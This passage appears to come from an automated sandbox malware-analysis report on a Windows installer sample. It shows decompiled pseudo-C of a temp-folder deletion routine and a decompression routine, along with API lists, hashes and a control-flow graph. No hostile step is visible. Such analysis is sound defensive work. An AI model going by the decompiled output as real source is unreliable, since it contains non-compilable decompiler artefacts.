								goto L30;
							}
							E00405569(0xfffffff1, _t68);
							return E004062C7(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                  0x00405c1d
                                  0x00405c22
                                  0x00405c2b
                                  0x00405c2e
                                  0x00405c36
                                  0x00405c39
                                  0x00405c3c
                                  0x00405c44
                                  0x00405c46
                                  0x00405c47
                                  0x00000000
                                  0x00405c47
                                  0x00405c52
                                  0x00405c55
                                  0x00405c55
                                  0x00405c55
                                  0x00405c59
                                  0x00405c6c
                                  0x00405c73
                                  0x00405c78
                                  0x00405c7c
                                  0x00405c8c
                                  0x00405c7e
                                  0x00405c84
                                  0x00405c84
                                  0x00405c91
                                  0x00405c95
                                  0x00405ca1
                                  0x00405ca7
                                  0x00405cac
                                  0x00405cb2
                                  0x00405cbd
                                  0x00405cc3
                                  0x00405cc5
                                  0x00405cc8
                                  0x00405d72
                                  0x00405d72
                                  0x00405d76
                                  0x00405d78
                                  0x00405d78
                                  0x00405d78
                                  0x00405d78
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405cce
                                  0x00405cce
                                  0x00405cce
                                  0x00405cd6
                                  0x00405cf6
                                  0x00405cfe
                                  0x00405d03
                                  0x00405d0a
                                  0x00405d25
                                  0x00405d2a
                                  0x00405d2c
                                  0x00405d50
                                  0x00405d2e
                                  0x00405d2e
                                  0x00405d31
                                  0x00405d45
                                  0x00405d33
                                  0x00405d36
                                  0x00405d3e
                                  0x00405d3e
                                  0x00405d31
                                  0x00405d0c
                                  0x00405d12
                                  0x00405d14
                                  0x00405d1a
                                  0x00405d1a
                                  0x00405d14
                                  0x00000000
                                  0x00405d0a
                                  0x00405cd8
                                  0x00405ce0
                                  0x00000000
                                  0x00000000
                                  0x00405ce2
                                  0x00405cea
                                  0x00000000
                                  0x00000000
                                  0x00405cec
                                  0x00405cf4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405d55
                                  0x00405d5d
                                  0x00405d63
                                  0x00405d63
                                  0x00405d6c
                                  0x00000000
                                  0x00405d6c
                                  0x00405c97
                                  0x00405c9f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405c5b
                                  0x00405c5b
                                  0x00405c5d
                                  0x00405d7d
                                  0x00405d7f
                                  0x00405d82
                                  0x00405dd3
                                  0x00405dd3
                                  0x00405dd3
                                  0x00405d84
                                  0x00405d87
                                  0x00405d92
                                  0x00405d97
                                  0x00405d99
                                  0x00000000
                                  0x00000000
                                  0x00405d9c
                                  0x00405da8
                                  0x00405dad
                                  0x00405daf
                                  0x00000000
                                  0x00405dca
                                  0x00405db1
                                  0x00405db4
                                  0x00000000
                                  0x00000000
                                  0x00405db9
                                  0x00000000
                                  0x00405dc0
                                  0x00405d89
                                  0x00405d89
                                  0x00000000
                                  0x00405d89
                                  0x00405c63
                                  0x00405c66
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405c66

                                  APIs
                                  • DeleteFileW.KERNELBASE(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*,\*.*), ref: 00405C84
                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*,?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                                  • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*,?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                                  • FindClose.KERNELBASE(00000000), ref: 00405D6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz176C.tmp\*.*$\*.*
                                  • API String ID: 2035342205-3414810432
                                  • Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                  • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                  • Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                  • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 601 406bfe-406c03 602 406c74-406c92 601->602 603 406c05-406c34 601->603 604 40726a-40727f 602->604 605 406c36-406c39 603->605 606 406c3b-406c3f 603->606 610 407281-407297 604->610 611 407299-4072af 604->611 607 406c4b-406c4e 605->607 608 406c41-406c45 606->608 609 406c47 606->609 612 406c50-406c59 607->612 613 406c6c-406c6f 607->613 608->607 609->607 614 4072b2-4072b9 610->614 611->614 617 406c5b 612->617 618 406c5e-406c6a 612->618 619 406e41-406e5f 613->619 615 4072e0-4072ec 614->615 616 4072bb-4072bf 614->616 627 406a82-406a8b 615->627 620 4072c5-4072dd 616->620 621 40746e-407478 616->621 617->618 623 406cd4-406d02 618->623 624 406e61-406e75 619->624 625 406e77-406e89 619->625 620->615 626 407484-407497 621->626 628 406d04-406d1c 623->628 629 406d1e-406d38 623->629 630 406e8c-406e96 624->630 625->630 633 40749c-4074a0 626->633 635 406a91 627->635 636 407499 627->636 634 406d3b-406d45 628->634 629->634 631 406e98 630->631 632 406e39-406e3f 630->632 637 406e14-406e18 631->637 638 406fa9-406fb6 631->638 632->619 639 406ddd-406de7 632->639 640 406d4b 634->640 641 406cbc-406cc2 634->641 642 406a98-406a9c 635->642 643 406bd8-406bf9 635->643 644 406b3d-406b41 635->644 645 406bad-406bb1 635->645 636->633 654 407420-40742a 637->654 655 406e1e-406e36 637->655 638->627 648 40742c-407436 639->648 649 406ded-406e0f 639->649 662 406ca1-406cb9 640->662 663 407408-407412 640->663 650 406d75-406d7b 641->650 651 406cc8-406cce 641->651 642->626 657 406aa2-406aaf 642->657 643->604 652 406b47-406b60 644->652 653 4073ed-4073f7 644->653 646 406bb7-406bcb 645->646 647 4073fc-407406 645->647 661 406bce-406bd6 646->661 647->626 648->626 649->638 659 406dd9 650->659 660 406d7d-406d9b 650->660 651->623 651->659 664 406b63-406b67 652->664 653->626 654->626 655->632 657->636 658 406ab5-406afb 657->658 665 406b23-406b25 658->665 666 406afd-406b01 658->666 659->639 667 406db3-406dc5 660->667 668 406d9d-406db1 660->668 661->643 661->645 662->641 663->626 664->644 669 406b69-406b6f 664->669 673 406b33-406b3b 665->673 674 406b27-406b31 665->674 670 406b03-406b06 GlobalFree 666->670 671 406b0c-406b1a GlobalAlloc 666->671 672 406dc8-406dd2 667->672 668->672 675 406b71-406b78 669->675 676 406b99-406bab 669->676 670->671 671->636 677 406b20 671->677 672->650 678 406dd4 672->678 673->664 674->673 674->674 679 406b83-406b93 GlobalAlloc 675->679 680 406b7a-406b7d GlobalFree 675->680 676->661 677->665 682 407414-40741e 678->682 683 406d5a-406d72 678->683 679->636 679->676 680->679 682->626 683->650
                                  C-Code - Quality: 98%
                                  			E00406BFE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
